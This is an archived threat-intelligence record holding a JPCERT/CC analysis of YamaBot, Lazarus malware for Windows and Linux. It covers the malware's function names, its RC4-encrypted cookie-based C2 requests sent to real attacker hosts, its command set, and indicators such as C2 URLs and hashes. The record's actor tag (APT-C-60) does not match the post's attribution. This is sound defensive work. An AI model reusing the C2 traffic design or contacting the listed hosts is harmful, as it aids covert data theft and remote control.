{
	"id": "a86be2ae-6638-4755-ae15-a9bd13458491",
	"created_at": "2026-04-06T00:06:52.813537Z",
	"updated_at": "2026-04-10T03:30:11.964129Z",
	"deleted_at": null,
	"sha1_hash": "9fed14d392e7fa043af1885a188a8f98aa7d2ba1",
	"title": "YamaBot Malware Used by Lazarus - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 614971,
	"plain_text": "YamaBot Malware Used by Lazarus - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2022-07-06 · Archived: 2026-04-05 18:34:54 UTC\r\nLazarus\r\nJPCERT/CC is continuously investigating the activities by Lazarus. In 2021, JPCERT/CC presented on its attack\r\nactivities at CODE BLUE and HITCON.\r\nhttps://github.com/JPCERTCC/Lazarus-research/\r\nThe YamaBot malware shared in the above research report targeted the Linux OS, but another type recently found\r\ntargets Windows OS. (It is referred to as Kaos in the document, but this blog refers to it as YamaBot.) YamaBot is\r\nmalware coded in Golang, with slightly different functionality between types created for each platform. In\r\naddition to YamaBot, Lazarus also created several other types of malware targeting multiple platforms, such as\r\nVSingle. This article covers the details of YamaBot.\r\nOverview of YamaBot\r\nYamaBot malware communicates with C2 servers using HTTP requests. The following is a list of function names\r\nincluded in the sample that targets Windows OS. It is the attacker that named the malware as Yamabot. Those\r\ntargeting Windows OS have functions specific to it, such as creating and checking Mutex.\r\n_/D_/Bot/YamaBot/utilities.BaseDecodeR\r\n_/D_/Bot/YamaBot/utilities.HttpPostWithCookie\r\n_/D_/Bot/YamaBot/utilities.HttpPostWithFile\r\n_/D_/Bot/YamaBot/utilities.GetMacAddress\r\n_/D_/Bot/YamaBot/utilities.GetHash\r\n_/D_/Bot/YamaBot/utilities.GetCookieParams\r\n_/D_/Bot/YamaBot/utilities.GetRndString\r\n_/D_/Bot/YamaBot/utilities.BmpMaker\r\n_/D_/Bot/YamaBot/utilities.createMutex\r\n_/D_/Bot/YamaBot/utilities.CCheckkmutex\r\n_/D_/Bot/YamaBot/utilities.CIpaddress\r\n_/D_/Bot/YamaBot/utilities.COsname\r\n_/D_/Bot/YamaBot/utilities.getOSVer\r\n_/D_/Bot/YamaBot/utilities.Run\r\n_/D_/Bot/YamaBot/utilities.Run.func1\r\n_/D_/Bot/YamaBot/utilities.Run.func2\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Lunch\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Init_Verbindung\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Verschlusselte_Zeichenkette_Eerhalten\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).getInitBotInfo\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 1 of 9\n\n_/D_/Bot/YamaBot/engine.(*FileStruct).getEggPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).handleMarketPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).processMarketPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).getSessionStr\r\nThe following is a list of malware function names included in the sample targeting Linux OS. The name kaos was\r\nused for it.\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecodeR\r\n_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithCookie\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecode\r\n_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithFile\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GenerateUniqueID\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GetCookieParams\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseEncode\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GetRndString\r\n_/C_/Users/administrator/Downloads/kaos/utilities.EierKochen\r\n_/C_/Users/administrator/Downloads/kaos/utilities.CIpaddress\r\n_/C_/Users/administrator/Downloads/kaos/utilities.Run\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).Lunch\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).kandidatKaufhaus\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).initDuck\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).GetEncString\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getInitEggPrice\r\n_/C_/Users/administrator/Downloads/kaos/utilities.COsname\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getEggPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).handleMarketPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).processMarketPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getSessionStr\r\n_/C_/Users/administrator/Downloads/kaos/engine.NewEgg\r\nFigure 1 shows a part of the code to read configuration. The malware's configuration includes RC4 keys. (See\r\nAppendix A for further information on the configuration). The configuration has no difference depending on OS.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 2 of 9\n\nFigure 1: Code for reading configuration\r\nThe following sections describes YamaBot's communication methods and commands, focusing on the differences\r\nbetween the Linux OS version and the Windows OS version.\r\nCommunication methods\r\nYamaBot communicates with the C2 server using HTTP requests. The following is the first HTTP POST request\r\nsent by YamaBot. Although it is a HTTP POST request, there is no data to send. It is also unique in that the\r\nUserAgent is Base64-encoded.\r\nPOST /editor/session/aaa000/support.php HTTP/1.1\r\nHost: 213.180.180.154\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: 0\r\nAccept-Encoding: gzip\r\nAfter successfully connecting to the C2 server, YamaBot sends the following request, which includes information\r\nin its cookie header. The captcha_session contains a randomly generated string and a RC4 key ([random\r\ncharacters (16 bytes)][RC4 key (16 bytes)][random characters (4 bytes)]), Base64-encoded. The RC4 key is the\r\nfirst 16 bytes of the MD5 value created from the following data.\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 3 of 9\n\nTarget Windows OS: hostname, username, MAC address\r\nTarget Linux OS: hostname, username\r\nThe captcha_val contains device information and the results of command execution, RC4-encrypted and\r\nBase64-encoded.\r\nPOST /editor/session/aaa000/support.php HTTP/1.1\r\nHost: 213.180.180.154\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: 0\r\nCookie: captcha_session=MTE5NzZmMTYwYzRlNTU4YjhhNDZhMTM4ZGMwNzgzNTNhNmUy; captcha_val=W%2BIePQNeokIn\r\nAccept-Encoding: gzip\r\nThe first data sent by captcha_val is OS information and IP address. The following contents are sent.\r\nwindows 6 amd64|[192.168.1.1]\r\nlinux 386|[192.168.1.1]\r\nFurthermore, if the size of the data to be sent exceeds a certain size (check the examples of 3,333 bytes and 7,000\r\nbytes), it is sent disguised as multi-part BMP data instead of captcha_val .\r\nPOST /recaptcha.php HTTP/1.1\r\nHost: www.karin-store.com\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: [Length]\r\nContent-Type: multipart/form-data; boundary=f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6af\r\nCookie: captcha_session=YTY5NDQ5MDYwNmRkNjIyOWI3MzU1NTNmYzMxMzhiNTAyNGJh; captcha_val=NGI5NjdhNTdhNjl\r\nAccept-Encoding: gzip\r\n--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb\r\nContent-Disposition: form-data; name=\"recaptcha\"; filename=\"recaptcha.png\"\r\nContent-Type: application/octet-stream\r\nBMf6(....0a..DT043b01c728892b495b99ea4c257fe3a8fea3a5f\r\n--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb--\r\nThe commands from the server are included in the Set-Cookie header. They are RC4-encrypted and Base64-\r\nencoded and then included in the captcha_session as follows. Note that the data sent by the malware is used as\r\nthe RC4 key.\r\nSet-Cookie: captcha_session=[Base64エンコードされた命令]\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 4 of 9\n\nCommand\r\nThe malware executes certain commands sent from its C2 server, and they are largely different depending on\r\ntarget OS. Those targeting Linux OS can only execute shell commands by /bin/sh. On the other hand, those\r\ntargeting Windows OS have multiple commands implemented as follows.\r\ndir: Get the file list\r\nMapfs: Get the directory list\r\nDownload: Download file\r\nInfo: Send file path and PID\r\nSleep: Change sleep time\r\nUninstall: Delete itself\r\ni: Change interval time\r\nOthers: Execute a given string with shell command\r\nThe command is in the form of [command][command parameters] , and the first half includes the above command.\r\nWhen the command i is executed, the execution result is sent including German language as follows. The\r\nreason why German language is included in YamaBot is unknown.\r\nFigure 2: Data sent when executing i command\r\nIn closing\r\nYamaBot malware is still used by attackers. Since it targets not only Windows OS but also Linux OS, servers\r\nshould also be carefully investigated during incident investigation. Attention should continuously paid as attacks\r\nby Lazarus have been confirmed in Japan. Another type of malware used by Lazarus will be covered in the next\r\nissue.\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 5 of 9\n\nAppendix A: Configuration Information\r\nTable A-2: List of configuration information (x86)\r\nOffset Description Notes\r\n0x000 interval communication interval\r\n0x004 - unused\r\n0x008 C2 server\r\n0x00C C2 server length\r\n0x010 RC4 key\r\n0x014 RC4key length\r\n0x018 C2 server connection C2 server connection successful/unsuccessful\r\n0x01C Cookie header value Value to set in cookie header\r\n0x020 - unused\r\n0x024 The number of connections The number of reconnections to C2 server\r\nTable A-1: List of configuration information (x64)\r\nOffset Description Notes\r\n0x000 interval communication interval\r\n0x008 C2 server\r\n0x010 C2 server length\r\n0x018 RC4 key\r\n0x020 RC4 key length\r\n0x028 C2 server connection C2 server connection successful/unsuccessful\r\n0x030 Cookie header value Value to set in cookie header\r\n0x038 - unused\r\n0x040 The number of connections The number of reconnections to C2 server\r\nAppendix B: C2 server\r\nhttp://www.karin-store.com/recaptcha.php\r\nhttp://yoshinorihirano.net/wp-includes/feed-xml.php\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 6 of 9\n\nhttp://213.180.180.154/editor/session/aaa000/support.php\r\nAppendix C: Malware hash value\r\nf226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\n6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nUpdate on Attacks by Threat Group APT-C-60\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 7 of 9\n\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nDslogdRAT Malware Installed in Ivanti Connect Secure\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 8 of 9\n\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html"
	],
	"report_names": [
		"yamabot.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434012,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.pdf",
		"text": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.txt",
		"img": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.jpg"
	}
}